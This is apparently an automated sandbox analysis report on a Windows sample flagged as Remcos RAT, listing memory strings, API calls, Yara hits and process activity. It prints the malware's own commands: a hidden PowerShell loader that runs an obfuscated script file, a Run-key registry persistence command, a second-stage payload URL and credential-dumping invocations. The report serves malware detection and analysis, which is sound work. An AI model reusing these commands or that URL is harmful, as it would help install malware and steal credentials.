            Source: Conspect124.exe, 00000007.00000002.4177334416.0000000023B90000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
            Source: Conspect124.exeString found in binary or memory: http://www.nirsoft.net/
            Source: powershell.exe, 00000001.00000002.3165842490.0000000004961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: Conspect124.exe, 00000007.00000002.4164316421.0000000006EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cmgtrading.eu/eODGqfP132.bin
            Source: Conspect124.exe, 00000007.00000002.4164316421.0000000006EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cmgtrading.eu/eODGqfP132.binC
            Source: powershell.exe, 00000001.00000002.3170024111.00000000059C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.3170024111.00000000059C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.3170024111.00000000059C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000001.00000002.3165842490.0000000004AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: Conspect124.exeString found in binary or memory: https://login.yahoo.com/config/login
            Source: powershell.exe, 00000001.00000002.3170024111.00000000059C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: Conspect124.exeString found in binary or memory: https://www.google.com
            Source: Conspect124.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: unknownNetwork traffic detected: HTTP traffic on port 64859 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64859
            Source: unknownHTTPS traffic detected: 185.26.107.57:443 -> 192.168.2.4:64859 version: TLS 1.2
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeCode function: 0_2_004053EF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004053EF
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,11_2_0040987A
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_004098E2
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_00406DFC
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,12_2_00406E9F
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004068B5
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_004072B5

            E-Banking Fraud

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4164316421.0000000006F06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Conspect124.exe PID: 1800, type: MEMORYSTR

            System Summary

            barindex
            Powershell drops PE file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Conspect124.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_00401806 NtdllDefWindowProc_W,11_2_00401806
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_004018C0 NtdllDefWindowProc_W,11_2_004018C0
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_004016FD NtdllDefWindowProc_A,12_2_004016FD
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_004017B7 NtdllDefWindowProc_A,12_2_004017B7
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_00402CAC NtdllDefWindowProc_A,13_2_00402CAC
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_00402D66 NtdllDefWindowProc_A,13_2_00402D66
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeCode function: 0_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040333D
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,7_2_0040333D
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeFile created: C:\Windows\brandbombernes.lnkJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeCode function: 0_2_004069560_2_00406956
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeCode function: 0_2_00404C2C0_2_00404C2C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_02DAEAE01_2_02DAEAE0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_02DAF3B01_2_02DAF3B0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_02DAE7981_2_02DAE798
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_004069567_2_00406956
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_00404C2C7_2_00404C2C
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_23BD71947_2_23BD7194
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_23BCB5C17_2_23BCB5C1
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0044B04011_2_0044B040
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0043610D11_2_0043610D
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0044731011_2_00447310
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0044A49011_2_0044A490
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0040755A11_2_0040755A
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0043C56011_2_0043C560
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0044B61011_2_0044B610
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0044D6C011_2_0044D6C0
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_004476F011_2_004476F0
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0044B87011_2_0044B870
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0044081D11_2_0044081D
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0041495711_2_00414957
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_004079EE11_2_004079EE
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_00407AEB11_2_00407AEB
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0044AA8011_2_0044AA80
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_00412AA911_2_00412AA9
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_00404B7411_2_00404B74
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_00404B0311_2_00404B03
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0044BBD811_2_0044BBD8
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_00404BE511_2_00404BE5
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_00404C7611_2_00404C76
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_00415CFE11_2_00415CFE
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_00416D7211_2_00416D72
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_00446D3011_2_00446D30
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_00446D8B11_2_00446D8B
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_00406E8F11_2_00406E8F
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_0040503812_2_00405038
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_0041208C12_2_0041208C
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_004050A912_2_004050A9
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_0040511A12_2_0040511A
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_0043C13A12_2_0043C13A
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_004051AB12_2_004051AB
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_0044930012_2_00449300
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_0040D32212_2_0040D322
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_0044A4F012_2_0044A4F0
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_0043A5AB12_2_0043A5AB
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_0041363112_2_00413631
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_0044669012_2_00446690
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_0044A73012_2_0044A730
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_004398D812_2_004398D8
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_004498E012_2_004498E0
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_0044A88612_2_0044A886
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_0043DA0912_2_0043DA09
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_00438D5E12_2_00438D5E
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_00449ED012_2_00449ED0
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_0041FE8312_2_0041FE83
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_00430F5412_2_00430F54
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_004050C213_2_004050C2
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_004014AB13_2_004014AB
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_0040513313_2_00405133
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_004051A413_2_004051A4
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_0040124613_2_00401246
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_0040CA4613_2_0040CA46
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_0040523513_2_00405235
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_004032C813_2_004032C8
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_004222D913_2_004222D9
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_0040168913_2_00401689
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_00402F6013_2_00402F60
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: String function: 004169A7 appears 87 times
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: String function: 0044DB70 appears 41 times
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: String function: 004165FF appears 35 times
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: String function: 00422297 appears 42 times
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: String function: 00444B5A appears 37 times
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: String function: 00413025 appears 79 times
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: String function: 00416760 appears 69 times
            Source: SDWLLRJcsY.exeStatic PE information: invalid certificate
            Source: SDWLLRJcsY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"
            Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@17/15@2/3
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,11_2_004182CE
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeCode function: 0_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040333D
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,7_2_0040333D
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,13_2_00410DE1
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeCode function: 0_2_004046B0 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046B0
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,11_2_00413D4C
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeCode function: 0_2_004020FE CoCreateInstance,0_2_004020FE
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,11_2_0040B58D
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeFile created: C:\Users\user\AppData\Roaming\intercessionateJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-DSGECX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3284:120:WilError_03
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeFile created: C:\Users\user\AppData\Local\Temp\nsd4F13.tmpJump to behavior
            Source: SDWLLRJcsY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSystem information queried: HandleInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Conspect124.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: Conspect124.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: Conspect124.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: Conspect124.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: Conspect124.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: Conspect124.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: SDWLLRJcsY.exeReversingLabs: Detection: 13%
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeFile read: C:\Users\user\Desktop\SDWLLRJcsY.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
            Source: unknownProcess created: C:\Users\user\Desktop\SDWLLRJcsY.exe "C:\Users\user\Desktop\SDWLLRJcsY.exe"
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Conspect124.exe "C:\Users\user\AppData\Local\Temp\Conspect124.exe"
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess created: C:\Users\user\AppData\Local\Temp\Conspect124.exe C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\llsemopjpzfqlbiqwdrulxfexi"
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess created: C:\Users\user\AppData\Local\Temp\Conspect124.exe C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\vnfxngzclhxvohwunodvwkzvgosxx"
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess created: C:\Users\user\AppData\Local\Temp\Conspect124.exe C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\fhlpgzkezppayvsywzqpzpmegvkgywqb"
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Conspect124.exe "C:\Users\user\AppData\Local\Temp\Conspect124.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess created: C:\Users\user\AppData\Local\Temp\Conspect124.exe C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\llsemopjpzfqlbiqwdrulxfexi"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess created: C:\Users\user\AppData\Local\Temp\Conspect124.exe C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\vnfxngzclhxvohwunodvwkzvgosxx"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess created: C:\Users\user\AppData\Local\Temp\Conspect124.exe C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\fhlpgzkezppayvsywzqpzpmegvkgywqb"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"Jump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
